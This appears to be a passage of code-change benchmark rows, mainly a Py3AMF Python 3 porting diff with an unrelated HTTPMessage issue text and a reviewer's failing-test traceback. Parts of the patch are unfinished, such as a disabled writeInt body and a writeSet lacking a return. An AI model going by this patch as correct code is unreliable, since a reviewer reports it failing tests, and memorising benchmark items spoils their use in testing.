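def celsius_to_kelvin(values):
    return np.asarray(values) + 273.15

kelvin = np.array([1.0, 2.0, 3.0])
celsius = np.array([-272.15, -271.15, -270.15])

# Comparing raw magnitudes is wrong; comparing after conversion is right.
assert not np.allclose(kelvin, celsius)
assert np.allclose(kelvin, celsius_to_kelvin(celsius))
```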
| FTR #408 is only _part_ of the solution to this issue.
Another problem with `np.isclose` and temperature units is that the following line will raise an error for units that have a `base_offset`
https://github.com/yt-project/unyt/blob/79ef518e4cb881352ab4395eec0ea69be94b08df/unyt/_array_functions.py#L472
this is probably simple enough to fix, though to avoid building a chain of co-dependent PRs, I'll wait for #410 and #408 to be resolved. | 2023-04-10T20:53:52 | 0.0 | [] | [] |
||
StdCarrot/Py3AMF | StdCarrot__Py3AMF-12 | 2647369fca00d78305fd70b6fa055b616ba3346d | diff --git a/MANIFEST.in b/MANIFEST.in
index e7fac46c..1de8b8e6 100644
--- a/MANIFEST.in
+++ b/MANIFEST.in
@@ -7,3 +7,5 @@ include *.txt
include *.md
global-exclude *.swf
global-exclude *.pyc
+include cpyamf/*.pyx
+include cpyamf/*.pxd
\ No newline at end of file
diff --git a/cpyamf/amf0.pyx b/cpyamf/amf0.pyx
index 2dac848b..b0ca1dde 100644
--- a/cpyamf/amf0.pyx
+++ b/cpyamf/amf0.pyx
@@ -6,7 +6,6 @@ C-extension for L{pyamf.amf3} Python module in L{PyAMF<pyamf>}.
:since: 0.6
"""
-
from cpython cimport *
from libc.stdlib cimport *
from libc.string cimport *
@@ -20,24 +19,24 @@ import pyamf
from pyamf import xml, util
-cdef char TYPE_NUMBER = '\x00'
-cdef char TYPE_BOOL = '\x01'
-cdef char TYPE_STRING = '\x02'
-cdef char TYPE_OBJECT = '\x03'
-cdef char TYPE_MOVIECLIP = '\x04'
-cdef char TYPE_NULL = '\x05'
-cdef char TYPE_UNDEFINED = '\x06'
-cdef char TYPE_REFERENCE = '\x07'
-cdef char TYPE_MIXEDARRAY = '\x08'
-cdef char TYPE_OBJECTTERM = '\x09'
-cdef char TYPE_ARRAY = '\x0A'
-cdef char TYPE_DATE = '\x0B'
-cdef char TYPE_LONGSTRING = '\x0C'
-cdef char TYPE_UNSUPPORTED = '\x0D'
-cdef char TYPE_RECORDSET = '\x0E'
-cdef char TYPE_XML = '\x0F'
-cdef char TYPE_TYPEDOBJECT = '\x10'
-cdef char TYPE_AMF3 = '\x11'
+cdef char TYPE_NUMBER = b'\x00'
+cdef char TYPE_BOOL = b'\x01'
+cdef char TYPE_STRING = b'\x02'
+cdef char TYPE_OBJECT = b'\x03'
+cdef char TYPE_MOVIECLIP = b'\x04'
+cdef char TYPE_NULL = b'\x05'
+cdef char TYPE_UNDEFINED = b'\x06'
+cdef char TYPE_REFERENCE = b'\x07'
+cdef char TYPE_MIXEDARRAY = b'\x08'
+cdef char TYPE_OBJECTTERM = b'\x09'
+cdef char TYPE_ARRAY = b'\x0A'
+cdef char TYPE_DATE = b'\x0B'
+cdef char TYPE_LONGSTRING = b'\x0C'
+cdef char TYPE_UNSUPPORTED = b'\x0D'
+cdef char TYPE_RECORDSET = b'\x0E'
+cdef char TYPE_XML = b'\x0F'
+cdef char TYPE_TYPEDOBJECT = b'\x10'
+cdef char TYPE_AMF3 = b'\x11'
cdef object ASObject = pyamf.ASObject
@@ -122,7 +121,7 @@ cdef class Decoder(codec.Decoder):
break
- key = self.readBytes()
+ key = self.readString()
PyDict_SetItem(obj_attrs, key, self.readElement())
@@ -181,7 +180,7 @@ cdef class Decoder(codec.Decoder):
self.readObjectAttributes(attrs)
- for key, value in attrs.iteritems():
+ for key, value in attrs.items():
try:
key = int(key)
except ValueError:
@@ -229,7 +228,7 @@ cdef class Decoder(codec.Decoder):
l = self.stream.read_ulong()
self.stream.read(&b, l)
- s = PyString_FromStringAndSize(b, <Py_ssize_t>l)
+ s = PyBytes_FromStringAndSize(b, <Py_ssize_t>l)
if bytes:
return s
@@ -329,9 +328,9 @@ cdef class Encoder(codec.Encoder):
self.writeType(TYPE_BOOL)
if b is True:
- return self.writeType('\x01')
+ return self.writeType(b'\x01')
else:
- return self.writeType('\x00')
+ return self.writeType(b'\x00')
cdef int writeUndefined(self, data) except -1:
return self.writeType(TYPE_UNDEFINED)
@@ -387,6 +386,28 @@ cdef class Encoder(codec.Encoder):
return 0
+ cdef int writeSet(self, object a) except -1:
+ cdef Py_ssize_t size = -1, i = -1
+
+ if self.writeReference(a) != -1:
+ return 0
+
+ self.context.addObject(a)
+
+ self.writeType(TYPE_ARRAY)
+ size = PySet_GET_SIZE(a)
+
+ self.stream.write_ulong(size)
+
+ set_iter = iter(a)
+ while True:
+ try:
+ self.writeElement(next(set_iter))
+ except StopIteration:
+ break
+
+ return 0
+
cdef int writeInt(self, object a) except -1:
self.writeType(TYPE_NUMBER)
@@ -406,7 +427,7 @@ cdef class Encoder(codec.Encoder):
"""
Write a string of bytes to the data stream.
"""
- cdef Py_ssize_t l = PyString_GET_SIZE(s)
+ cdef Py_ssize_t l = PyBytes_GET_SIZE(s)
if l > 0xffff:
self.writeType(TYPE_LONGSTRING)
@@ -418,7 +439,7 @@ cdef class Encoder(codec.Encoder):
else:
self.stream.write_ushort(l)
- return self.stream.write(PyString_AS_STRING(s), l)
+ return self.stream.write(PyBytes_AS_STRING(s), l)
cdef int writeString(self, u) except -1:
"""
@@ -435,14 +456,14 @@ cdef class Encoder(codec.Encoder):
if PyUnicode_CheckExact(u):
u = self.context.getBytesForString(u)
- cdef Py_ssize_t l = PyString_GET_SIZE(u)
+ cdef Py_ssize_t l = PyBytes_GET_SIZE(u)
if l > 0xffff:
self.stream.write_ulong(l)
else:
self.stream.write_ushort(l)
- return self.stream.write(PyString_AS_STRING(u), l)
+ return self.stream.write(PyBytes_AS_STRING(u), l)
cdef int writeXML(self, e) except -1:
"""
@@ -455,14 +476,14 @@ cdef class Encoder(codec.Encoder):
if isinstance(data, unicode):
data = data.encode('utf-8')
- if not PyString_CheckExact(data):
+ if not PyBytes_CheckExact(data):
raise TypeError('expected str from xml.tostring')
- cdef Py_ssize_t l = PyString_GET_SIZE(data)
+ cdef Py_ssize_t l = PyBytes_GET_SIZE(data)
self.stream.write_ulong(l)
- return self.stream.write(PyString_AS_STRING(data), l)
+ return self.stream.write(PyBytes_AS_STRING(data), l)
cdef int writeDateTime(self, d) except -1:
if self.timezone_offset is not None:
@@ -491,9 +512,9 @@ cdef class Encoder(codec.Encoder):
@param o: The C{dict} data to be encoded to the AMF0 data stream.
"""
- for key, value in attrs.iteritems():
- if PyInt_Check(key) or PyLong_Check(key):
- key = str(key)
+ for key, value in attrs.items():
+ if PyLong_Check(key):
+ key = str(key).encode()
self.serialiseString(key)
self.writeElement(value)
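The `writeBytes`/`serialiseString` paths above follow AMF0's two string forms: a short string (marker 0x02) with a u16 length prefix for payloads up to 0xFFFF bytes, and a long string (marker 0x0C) with a u32 prefix beyond that. A pure-Python sketch of that framing (an illustration of the wire format, not the module's actual API):

```python
import struct

AMF0_STRING = 0x02       # u16 big-endian length prefix
AMF0_LONGSTRING = 0x0C   # u32 big-endian length prefix

def encode_amf0_string(payload: bytes) -> bytes:
    if len(payload) > 0xFFFF:
        return bytes([AMF0_LONGSTRING]) + struct.pack(">I", len(payload)) + payload
    return bytes([AMF0_STRING]) + struct.pack(">H", len(payload)) + payload

assert encode_amf0_string(b"hi") == b"\x02\x00\x02hi"
assert encode_amf0_string(b"x" * 70000)[0] == AMF0_LONGSTRING
```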
diff --git a/cpyamf/amf3.pyx b/cpyamf/amf3.pyx
index 8b5c29d6..c8d8ec6e 100644
--- a/cpyamf/amf3.pyx
+++ b/cpyamf/amf3.pyx
@@ -25,22 +25,22 @@ except ImportError:
zlib = None
-cdef char TYPE_UNDEFINED = '\x00'
-cdef char TYPE_NULL = '\x01'
-cdef char TYPE_BOOL_FALSE = '\x02'
-cdef char TYPE_BOOL_TRUE = '\x03'
-cdef char TYPE_INTEGER = '\x04'
-cdef char TYPE_NUMBER = '\x05'
-cdef char TYPE_STRING = '\x06'
-cdef char TYPE_XML = '\x07'
-cdef char TYPE_DATE = '\x08'
-cdef char TYPE_ARRAY = '\x09'
-cdef char TYPE_OBJECT = '\x0A'
-cdef char TYPE_XMLSTRING = '\x0B'
-cdef char TYPE_BYTEARRAY = '\x0C'
+cdef char TYPE_UNDEFINED = b'\x00'
+cdef char TYPE_NULL = b'\x01'
+cdef char TYPE_BOOL_FALSE = b'\x02'
+cdef char TYPE_BOOL_TRUE = b'\x03'
+cdef char TYPE_INTEGER = b'\x04'
+cdef char TYPE_NUMBER = b'\x05'
+cdef char TYPE_STRING = b'\x06'
+cdef char TYPE_XML = b'\x07'
+cdef char TYPE_DATE = b'\x08'
+cdef char TYPE_ARRAY = b'\x09'
+cdef char TYPE_OBJECT = b'\x0A'
+cdef char TYPE_XMLSTRING = b'\x0B'
+cdef char TYPE_BYTEARRAY = b'\x0C'
cdef unsigned int REFERENCE_BIT = 0x01
-cdef char REF_CHAR = '\x01'
+cdef char REF_CHAR = b'\x01'
#: The maximum that can be represented by an signed 29 bit integer.
cdef long MAX_29B_INT = 0x0FFFFFFF
@@ -56,8 +56,8 @@ cdef int OBJECT_ENCODING_PROXY = 0x03
cdef object ByteArrayType = amf3.ByteArray
cdef object DataInput = amf3.DataInput
cdef object DataOutput = amf3.DataOutput
-cdef str empty_string = str('')
-cdef unicode empty_unicode = empty_string.decode('utf-8')
+cdef bytes empty_bytes = b''
+cdef unicode empty_unicode = u''
cdef object undefined = pyamf.Undefined
@@ -435,7 +435,7 @@ cdef class Decoder(codec.Decoder):
break
- attr = self.readBytes()
+ attr = self.readString()
PyDict_SetItem(obj, attr, self.readElement())
@@ -508,7 +508,7 @@ cdef class Decoder(codec.Decoder):
cdef object s
self.stream.read(&buf, ref)
- s = PyString_FromStringAndSize(buf, ref)
+ s = PyBytes_FromStringAndSize(buf, ref)
x = xml.fromstring(
s,
@@ -540,10 +540,10 @@ cdef class Decoder(codec.Decoder):
ref >>= 1
self.stream.read(&buf, ref)
- s = PyString_FromStringAndSize(buf, ref)
+ s = PyBytes_FromStringAndSize(buf, ref)
if zlib:
- if ref > 2 and buf[0] == '\x78' and buf[1] == '\x9c':
+ if ref > 2 and buf[0] == b'\x78' and buf[1] == b'\x9c':
try:
s = zlib.decompress(s)
except zlib.error:
@@ -635,8 +635,8 @@ cdef class Encoder(codec.Encoder):
if PyUnicode_Check(u):
l = PyUnicode_GET_SIZE(u)
is_unicode = 1
- elif PyString_Check(u):
- l = PyString_GET_SIZE(u)
+ elif PyBytes_Check(u):
+ l = PyBytes_GET_SIZE(u)
else:
raise TypeError('Expected str or unicode')
@@ -654,11 +654,11 @@ cdef class Encoder(codec.Encoder):
if is_unicode:
u = self.context.getBytesForString(u)
- l = PyString_GET_SIZE(u)
+ l = PyBytes_GET_SIZE(u)
_encode_integer(self.stream, (l << 1) | REFERENCE_BIT)
- return self.stream.write(PyString_AS_STRING(u), l)
+ return self.stream.write(PyBytes_AS_STRING(u), l)
cdef int writeString(self, object s) except -1:
self.writeType(TYPE_STRING)
@@ -669,6 +669,8 @@ cdef class Encoder(codec.Encoder):
self.serialiseString(s)
cdef int writeInt(self, object n) except -1:
+ self.writeLong(n)
+ """
cdef long x = PyInt_AS_LONG(n)
if x < MIN_29B_INT or x > MAX_29B_INT:
@@ -676,6 +678,7 @@ cdef class Encoder(codec.Encoder):
self.writeType(TYPE_INTEGER)
_encode_integer(self.stream, x)
+ """
cdef int writeLong(self, object n) except -1:
cdef long x
@@ -718,7 +721,7 @@ cdef class Encoder(codec.Encoder):
_encode_integer(self.stream, (ref << 1) | REFERENCE_BIT)
- self.writeType('\x01')
+ self.writeType(b'\x01')
for i from 0 <= i < ref:
x = PyList_GET_ITEM(n, i)
@@ -727,6 +730,29 @@ cdef class Encoder(codec.Encoder):
return 0
+ cdef int writeSet(self, object n) except -1:
+ cdef Py_ssize_t ref = self.context.getObjectReference(n)
+ cdef Py_ssize_t i
+
+ self.writeType(TYPE_ARRAY)
+
+ if ref != -1:
+ return _encode_integer(self.stream, ref << 1)
+
+ self.context.addObject(n)
+
+ ref = PySet_GET_SIZE(n)
+
+ _encode_integer(self.stream, (ref << 1) | REFERENCE_BIT)
+ self.writeType(b'\x01')
+
+ set_iter = iter(n)
+ while True:
+ try:
+ self.writeElement(next(set_iter))
+ except StopIteration:
+ break
+
cdef int writeTuple(self, object n) except -1:
cdef Py_ssize_t ref = self.context.getObjectReference(n)
cdef Py_ssize_t i
@@ -742,7 +768,7 @@ cdef class Encoder(codec.Encoder):
ref = PyTuple_GET_SIZE(n)
_encode_integer(self.stream, (ref << 1) | REFERENCE_BIT)
- self.writeType('\x01')
+ self.writeType(b'\x01')
for i from 0 <= i < ref:
x = PyTuple_GET_ITEM(n, i)
@@ -782,7 +808,7 @@ cdef class Encoder(codec.Encoder):
if class_ref == 0:
self.stream.write(&REF_CHAR, 1)
- for key, value in obj.iteritems():
+ for key, value in obj.items():
if PyInt_Check(key) or PyLong_Check(key):
key = str(key)
@@ -966,11 +992,11 @@ cdef class Encoder(codec.Encoder):
self.context.addObject(obj)
- buf = str(obj)
- l = PyString_GET_SIZE(buf)
+ buf = bytes(obj)
+ l = PyBytes_GET_SIZE(buf)
_encode_integer(self.stream, (l << 1) | REFERENCE_BIT)
- self.stream.write(PyString_AS_STRING(buf), l)
+ self.stream.write(PyBytes_AS_STRING(buf), l)
return 0
@@ -986,15 +1012,15 @@ cdef class Encoder(codec.Encoder):
self.context.addObject(obj)
- s = xml.tostring(obj).encode('utf-8')
+ s = xml.tostring(obj) #.encode('utf-8')
- if not PyString_CheckExact(s):
- raise TypeError('Expected string from xml serialization')
+ if not PyBytes_CheckExact(s):
+ raise TypeError('Expected byte string from xml serialization')
- i = PyString_GET_SIZE(s)
+ i = PyBytes_GET_SIZE(s)
_encode_integer(self.stream, (i << 1) | REFERENCE_BIT)
- self.stream.write(PyString_AS_STRING(s), i)
+ self.stream.write(PyBytes_AS_STRING(s), i)
return 0
diff --git a/cpyamf/codec.pxd b/cpyamf/codec.pxd
index 57ff95a3..5f20b15f 100644
--- a/cpyamf/codec.pxd
+++ b/cpyamf/codec.pxd
@@ -60,8 +60,8 @@ cdef class Context(object):
cpdef Py_ssize_t getObjectReference(self, object obj) except -2
cpdef Py_ssize_t addObject(self, object obj) except -1
- cpdef unicode getStringForBytes(self, object s)
- cpdef str getBytesForString(self, object u)
+ cpdef str getStringForBytes(self, object s)
+ cpdef bytes getBytesForString(self, object u)
cdef class Codec(object):
@@ -117,6 +117,7 @@ cdef class Encoder(Codec):
cdef int writeDate(self, object o) except -1
cdef int writeXML(self, object o) except -1
cpdef int writeList(self, object o, bint is_proxy=?) except -1
+ cdef int writeSet(self, object o) except -1
cdef int writeTuple(self, object o) except -1
cdef int writeSequence(self, object iterable) except -1
cpdef int writeObject(self, object o, bint is_proxy=?) except -1
diff --git a/cpyamf/codec.pyx b/cpyamf/codec.pyx
index 8adabc35..c7cf5dc2 100644
--- a/cpyamf/codec.pyx
+++ b/cpyamf/codec.pyx
@@ -16,9 +16,6 @@ cdef extern from "datetime.h":
int PyDate_CheckExact(object)
int PyTime_CheckExact(object)
-cdef extern from "Python.h":
- bint PyClass_Check(object)
-
from cpyamf.util cimport cBufferedByteStream, BufferedByteStream
import types
@@ -274,7 +271,7 @@ cdef class Context(object):
try:
alias = pyamf.get_class_alias(klass)
except pyamf.UnknownClassAlias:
- if isinstance(klass, basestring):
+ if isinstance(klass, (bytes, unicode)):
raise
# no alias has been found yet .. check subclasses
@@ -286,7 +283,7 @@ cdef class Context(object):
return alias
- cpdef unicode getStringForBytes(self, object s):
+ cpdef str getStringForBytes(self, object s):
"""
Returns the corresponding unicode object for a given string. If there
is no unicode object, one is created.
@@ -298,14 +295,14 @@ cdef class Context(object):
if ret is not None:
return ret
- cdef unicode u = s.decode('utf-8')
+ cdef str u = s.decode('utf-8')
self.unicodes[s] = u
self._strings[u] = s
return u
- cpdef str getBytesForString(self, object u):
+ cpdef bytes getBytesForString(self, object u):
"""
Returns the corresponding utf-8 encoded string for a given unicode
object. If there is no string, one is encoded.
@@ -317,7 +314,7 @@ cdef class Context(object):
if ret is not None:
return ret
- cdef str s = u.encode('utf-8')
+ cdef bytes s = u.encode('utf-8')
self.unicodes[s] = u
self._strings[u] = s
@@ -518,6 +515,9 @@ cdef class Encoder(Codec):
cpdef int writeList(self, object o, bint is_proxy=0) except -1:
raise NotImplementedError
+ cdef int writeSet(self, object o) except -1:
+ raise NotImplementedError
+
cdef int writeTuple(self, object o) except -1:
raise NotImplementedError
@@ -525,11 +525,9 @@ cdef class Encoder(Codec):
raise NotImplementedError
cdef int writeGenerator(self, object o) except -1:
- cdef object n = getattr(o, 'next')
-
while True:
try:
- self.writeElement(n())
+ self.writeElement(next(o))
except StopIteration:
return 0
@@ -563,7 +561,7 @@ cdef class Encoder(Codec):
"""
cdef int ret = 1
- if PyString_Check(element):
+ if PyBytes_Check(element):
ret = self.writeBytes(element)
elif PyUnicode_Check(element):
ret = self.writeString(element)
@@ -571,8 +569,9 @@ cdef class Encoder(Codec):
ret = self.writeNull(element)
elif PyBool_Check(element):
ret = self.writeBoolean(element)
- elif PyInt_CheckExact(element):
- ret = self.writeInt(element)
+ # Int is Long
+ # elif PyInt_CheckExact(element):
+ # ret = self.writeInt(element)
elif PyLong_CheckExact(element):
ret = self.writeLong(element)
elif PyFloat_CheckExact(element):
@@ -581,6 +580,8 @@ cdef class Encoder(Codec):
ret = self.writeList(element)
elif PyTuple_CheckExact(element):
ret = self.writeTuple(element)
+ elif PyAnySet_CheckExact(element):
+ ret = self.writeSet(element)
elif element is Undefined:
ret = self.writeUndefined(element)
elif PyDict_CheckExact(element):
@@ -609,7 +610,9 @@ cdef class Encoder(Codec):
raise pyamf.EncodeError("Cannot encode functions %r" % (
element,
))
- elif PyClass_Check(element) or PyType_CheckExact(element):
+ # elif PyClass_Check(element) or PyType_CheckExact(element):
+ elif PyType_Check(element) or PyType_CheckExact(element):
+ # TODO: chek if this ^^^ is correct, or we need a different check
raise pyamf.EncodeError("Cannot encode class objects %r" % (
element,
))
@@ -678,7 +681,7 @@ cdef class Encoder(Codec):
self.stream.read(&buf, end_pos - start_pos)
- return PyString_FromStringAndSize(buf, end_pos - start_pos)
+ return PyBytes_FromStringAndSize(buf, end_pos - start_pos)
def __iter__(self):
return self
diff --git a/cpyamf/util.pyx b/cpyamf/util.pyx
index e75075f8..60450553 100644
--- a/cpyamf/util.pyx
+++ b/cpyamf/util.pyx
@@ -26,10 +26,10 @@ cdef extern from "Python.h":
from pyamf import python
# module constant declarations
-DEF ENDIAN_NETWORK = "!"
-DEF ENDIAN_NATIVE = "@"
-DEF ENDIAN_LITTLE = "<"
-DEF ENDIAN_BIG = ">"
+cdef char ENDIAN_NETWORK = b"!"
+cdef char ENDIAN_NATIVE = b"@"
+cdef char ENDIAN_LITTLE = b"<"
+cdef char ENDIAN_BIG = b">"
DEF MAX_BUFFER_EXTENSION = 1 << 14
@@ -37,9 +37,9 @@ cdef char SYSTEM_ENDIAN
cdef int float_broken = -1
-cdef unsigned char *NaN = <unsigned char *>'\xff\xf8\x00\x00\x00\x00\x00\x00'
-cdef unsigned char *NegInf = <unsigned char *>'\xff\xf0\x00\x00\x00\x00\x00\x00'
-cdef unsigned char *PosInf = <unsigned char *>'\x7f\xf0\x00\x00\x00\x00\x00\x00'
+cdef unsigned char *NaN = <unsigned char *>b'\xff\xf8\x00\x00\x00\x00\x00\x00'
+cdef unsigned char *NegInf = <unsigned char *>b'\xff\xf0\x00\x00\x00\x00\x00\x00'
+cdef unsigned char *PosInf = <unsigned char *>b'\x7f\xf0\x00\x00\x00\x00\x00\x00'
cdef double platform_nan
cdef double platform_posinf
@@ -365,7 +365,7 @@ cdef class cBufferedByteStream(object):
"""
Get raw data from buffer.
"""
- return PyString_FromStringAndSize(self.buffer, self.length)
+ return PyBytes_FromStringAndSize(self.buffer, self.length)
cdef Py_ssize_t peek(self, char **buf, Py_ssize_t size) except -1:
"""
@@ -741,12 +741,12 @@ cdef class cBufferedByteStream(object):
if PyUnicode_Check(obj) == 1:
encoded_string = PyUnicode_AsUTF8String(obj)
- elif PyString_Check(obj) == 1:
+ elif PyBytes_Check(obj) == 1:
encoded_string = obj
else:
raise TypeError('value must be Unicode or str')
- PyString_AsStringAndSize(encoded_string, &buf, &l)
+ PyBytes_AsStringAndSize(encoded_string, &buf, &l)
self.write(buf, l)
return 0
@@ -921,7 +921,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
elif isinstance(buf, cBufferedByteStream):
x = <cBufferedByteStream>buf
self.write(x.getvalue())
- elif isinstance(buf, (str, unicode)):
+ elif isinstance(buf, (bytes, str)):
self.write(buf)
elif hasattr(buf, 'getvalue'):
self.write(buf.getvalue())
@@ -937,16 +937,18 @@ cdef class BufferedByteStream(cBufferedByteStream):
property endian:
def __set__(self, value):
- if PyString_Check(value) == 0:
+ if PyBytes_Check(value) == 0:
raise TypeError('String value expected')
- if value not in [ENDIAN_NETWORK, ENDIAN_NATIVE, ENDIAN_LITTLE, ENDIAN_BIG]:
+ check_value = PyBytes_AsString(value)[0]
+
+ if check_value not in [ENDIAN_NETWORK, ENDIAN_NATIVE, ENDIAN_LITTLE, ENDIAN_BIG]:
raise ValueError('Not a valid endian type')
- self.endian = PyString_AsString(value)[0]
+ self.endian = check_value
def __get__(self):
- return PyString_FromStringAndSize(&self.endian, 1)
+ return PyBytes_FromStringAndSize(&self.endian, 1)
def read(self, size=-1):
"""
@@ -967,7 +969,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
cBufferedByteStream.read(self, &buf, s)
- return PyString_FromStringAndSize(buf, s)
+ return PyBytes_FromStringAndSize(buf, s)
def write(self, x, size=-1):
"""
@@ -1006,7 +1008,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
size = cBufferedByteStream.peek(self, &buf, size)
- return PyString_FromStringAndSize(buf, size)
+ return PyBytes_FromStringAndSize(buf, size)
def write_char(self, x):
"""
@@ -1016,7 +1018,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
@type x: C{int}
@raise TypeError: Unexpected type for int C{x}.
"""
- if PyInt_Check(x) == 0 and PyLong_Check(x) == 0:
+ if PyLong_Check(x) == 0:
raise TypeError('expected int for x')
cBufferedByteStream.write_char(self, <char>x)
@@ -1029,7 +1031,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
@type x: C{int}
@raise TypeError: Unexpected type for int C{x}.
"""
- if PyInt_Check(x) == 0 and PyLong_Check(x) == 0:
+ if PyLong_Check(x) == 0:
raise TypeError('expected int for x')
cBufferedByteStream.write_ushort(self, <unsigned short>x)
@@ -1042,7 +1044,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
@type x: C{int}
@raise TypeError: Unexpected type for int C{x}.
"""
- if PyInt_Check(x) == 0 and PyLong_Check(x) == 0:
+ if PyLong_Check(x) == 0:
raise TypeError('expected int for x')
cBufferedByteStream.write_short(self, <short>x)
@@ -1055,7 +1057,7 @@ cdef class BufferedByteStream(cBufferedByteStream):
@type x: C{int}
@raise TypeError: Unexpected type for int C{x}.
"""
- if PyInt_Check(x) == 0 and PyLong_Check(x) == 0:
+ if PyLong_Check(x) == 0:
raise TypeError('expected int for x')
if x > 4294967295L or x < 0:
diff --git a/pyamf/amf3.py b/pyamf/amf3.py
index 63e0a32c..525f39f2 100644
--- a/pyamf/amf3.py
+++ b/pyamf/amf3.py
@@ -1004,7 +1004,7 @@ def _getClassDefinition(self, ref):
if class_def.attr_len > 0:
for i in range(class_def.attr_len):
- key = self.readBytes()
+ key = self.readString()
class_def.static_properties.append(key)
diff --git a/pyamf/codec.py b/pyamf/codec.py
index 0773588f..ce8c8b41 100644
--- a/pyamf/codec.py
+++ b/pyamf/codec.py
@@ -517,7 +517,7 @@ def getTypeFunc(self, data):
return self.writeNumber
elif t in python.int_types:
return self.writeNumber
- elif t in (list, tuple, frozenset):
+ elif t in (list, tuple, set, frozenset):
return self.writeList
elif t is types.GeneratorType: # flake8: noqa
return self.writeGenerator
diff --git a/pyamf/remoting/gateway/twisted.py b/pyamf/remoting/gateway/twisted.py
index 9771a648..56107be6 100644
--- a/pyamf/remoting/gateway/twisted.py
+++ b/pyamf/remoting/gateway/twisted.py
@@ -227,7 +227,7 @@ class TwistedGateway(gateway.BaseGateway, resource.Resource):
@type expose_request: C{bool}
"""
- allowedMethods = ('POST',)
+ allowedMethods = (b'POST',)
def __init__(self, *args, **kwargs):
if 'expose_request' not in kwargs:
@@ -282,7 +282,7 @@ def handleDecodeError(failure):
if self.debug:
body += "\n\nTraceback:\n\n%s" % failure.getTraceback()
- self._finaliseRequest(request, 400, body)
+ self._finaliseRequest(request, 400, body.encode())
request.content.seek(0, 0)
timezone_offset = self._get_timezone_offset()
@@ -332,7 +332,7 @@ def eb(failure):
if self.debug:
body += "\n\nTraceback:\n\n%s" % failure.getTraceback()
- self._finaliseRequest(request, 500, body)
+ self._finaliseRequest(request, 500, body.encode())
timezone_offset = self._get_timezone_offset()
d = threads.deferToThread(
@@ -399,9 +399,9 @@ def eb(failure):
"be successfully processed."
if self.debug:
- body += "\n\nTraceback:\n\n%s" % failure.getTraceback()
+ body += b"\n\nTraceback:\n\n%s" % failure.getTraceback()
- self._finaliseRequest(http_request, 500, body)
+ self._finaliseRequest(http_request, 500, body.encode())
d = defer.DeferredList(dl)
diff --git a/pyamf/util/pure.py b/pyamf/util/pure.py
index e648e5c6..1d9e02a1 100644
--- a/pyamf/util/pure.py
+++ b/pyamf/util/pure.py
@@ -188,7 +188,15 @@ class DataTypeMixIn(object):
#: Big endian
ENDIAN_BIG = ">"
- endian = ENDIAN_NETWORK
+ __endian = ENDIAN_NETWORK
+
+ @property
+ def endian(self):
+ return self.__endian
+
+ @endian.setter
+ def endian(self, value):
+ self.__endian = value.decode('utf-8') if isinstance(value, bytes) else value
def _read(self, length):
"""
diff --git a/setup.py b/setup.py
index 7a58dcab..c1fd30d6 100644
--- a/setup.py
+++ b/setup.py
@@ -29,6 +29,7 @@
Operating System :: OS Independent
Programming Language :: C
Programming Language :: Python
+Programming Language :: Cython
Programming Language :: Python :: 3.5
Programming Language :: Python :: 3.6
Programming Language :: Python :: 3.7
diff --git a/setupinfo.py b/setupinfo.py
index 9184086f..a36aa589 100644
--- a/setupinfo.py
+++ b/setupinfo.py
@@ -5,9 +5,10 @@
Meta data and helper functions for setup
"""
-import sys
-import os.path
import fnmatch
+import os.path
+import platform
+import sys
try:
from Cython.Distutils import build_ext
@@ -26,8 +27,7 @@
_version = None
-jython = sys.platform.startswith('java')
-can_compile_extensions = not jython
+can_compile_extensions = platform.python_implementation() == "CPython"
class MyDistribution(Distribution):
@@ -134,12 +134,11 @@ def get_version():
def get_extras_require():
return {
- 'wsgi': ['wsgiref'],
- 'twisted': ['Twisted>=2.5.0'],
+ 'twisted': ['Twisted>=16.0.0'],
'django': ['Django>=0.96'],
'sqlalchemy': ['SQLAlchemy>=0.4'],
'elixir': ['Elixir>=0.7.1'],
- 'lxml': ['lxml>=2.2'],
+ 'lxml': ['lxml>=4.4.0'],
'six': ['six>=1.10.0']
}
@@ -175,12 +174,9 @@ def get_install_requirements():
"""
install_requires = ['defusedxml']
- if sys.version_info < (2, 5):
- install_requires.extend(["elementtree>=1.2.6", "uuid>=1.30"])
-
if 'dev' in get_version():
if can_compile_extensions:
- install_requires.extend(['Cython>=0.13'])
+ install_requires.extend(['Cython>=0.28'])
return install_requires
@@ -191,9 +187,6 @@ def get_test_requirements():
"""
tests_require = []
- if sys.version_info < (2, 7):
- tests_require.extend(['unittest2'])
-
return tests_require
@@ -250,6 +243,7 @@ def get_extensions():
Return a list of Extension instances that can be compiled.
"""
if not can_compile_extensions:
+ # due to changes in pip these prints have no effect
print(80 * '*')
print('WARNING:')
print(
@@ -264,8 +258,6 @@ def get_extensions():
extensions = []
- # Hide Cython extension
- """
for p in recursive_glob('.', '*.pyx'):
mod_name = os.path.splitext(p)[0].replace(os.path.sep, '.')
@@ -273,7 +265,6 @@ def get_extensions():
if e:
extensions.append(e)
- """
return extensions
| Fix fetching a header from an HTTPMessage
Support Python 3 by switching getheader() to get() to fetch a header value from an http.client.HTTPMessage
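The `getheader()` → `get()` switch can be checked in isolation: in Python 3, `http.client.HTTPMessage` subclasses `email.message.Message`, which provides `get()` (a standalone sketch, independent of PyAMF's client code):

```python
from http.client import HTTPMessage

# Build a header collection the way the response parser would populate it.
msg = HTTPMessage()
msg["Content-Encoding"] = "gzip"

# Python 2's mimetools-based message had getheader(); the Python 3
# HTTPMessage inherits get() from email.message.Message instead.
assert msg.get("Content-Encoding") == "gzip"
assert msg.get("Missing-Header") is None  # absent headers return None
```

As the traceback in the review comments shows, any test double standing in for `HTTPMessage` then needs a `get()` method as well.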
| Sorry, this PR was mis-merged.
This PR couldn't pass the test cases.
Please run "python3 setup.py test" before opening a PR.
```
======================================================================
ERROR: test_bad_response (pyamf.tests.remoting.test_client.GZipTestCase)
----------------------------------------------------------------------
Traceback (most recent call last):
File "/Users/yohan/IdeaProjects/Py3AMF/pyamf/tests/remoting/test_client.py", line 663, in test_bad_response
self.assertRaises(IOError, self.gw._getResponse, None)
File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/unittest/case.py", line 727, in assertRaises
return context.handle('assertRaises', args, kwargs)
File "/Library/Frameworks/Python.framework/Versions/3.5/lib/python3.5/unittest/case.py", line 176, in handle
callable_obj(*args, **kwargs)
File "/Users/yohan/IdeaProjects/Py3AMF/pyamf/remoting/client/__init__.py", line 458, in _getResponse
content_encoding = http_message.get('Content-Encoding')
AttributeError: 'MockHeaderCollection' object has no attribute 'get'
